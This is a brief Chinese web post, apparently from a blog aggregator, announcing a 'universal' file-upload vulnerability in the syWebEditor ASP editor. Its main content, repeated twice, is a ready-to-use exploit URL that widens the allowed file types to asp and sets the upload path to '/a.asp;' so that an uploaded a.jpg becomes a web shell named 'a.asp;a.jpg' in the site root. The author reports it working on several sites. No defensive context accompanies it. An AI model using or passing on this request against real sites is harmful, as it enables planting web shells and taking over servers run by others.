直接访问 /syWebEditor/UpImg.asp?isBack=&fileType=gif|jpg|png|asa|asp|mdb|&obj=L_Img&UpPath=/a.asp; 上传a.jpg后,shell在根目录下,名为a.asp;a.jpg 试了几个,都能成功,应该是通杀的... |
syWebEditor的一个通杀漏洞
最新推荐文章于 2023-12-08 19:15:00 发布
直接访问 /syWebEditor/UpImg.asp?isBack=&fileType=gif|jpg|png|asa|asp|mdb|&obj=L_Img&UpPath=/a.asp; 上传a.jpg后,shell在根目录下,名为a.asp;a.jpg 试了几个,都能成功,应该是通杀的... |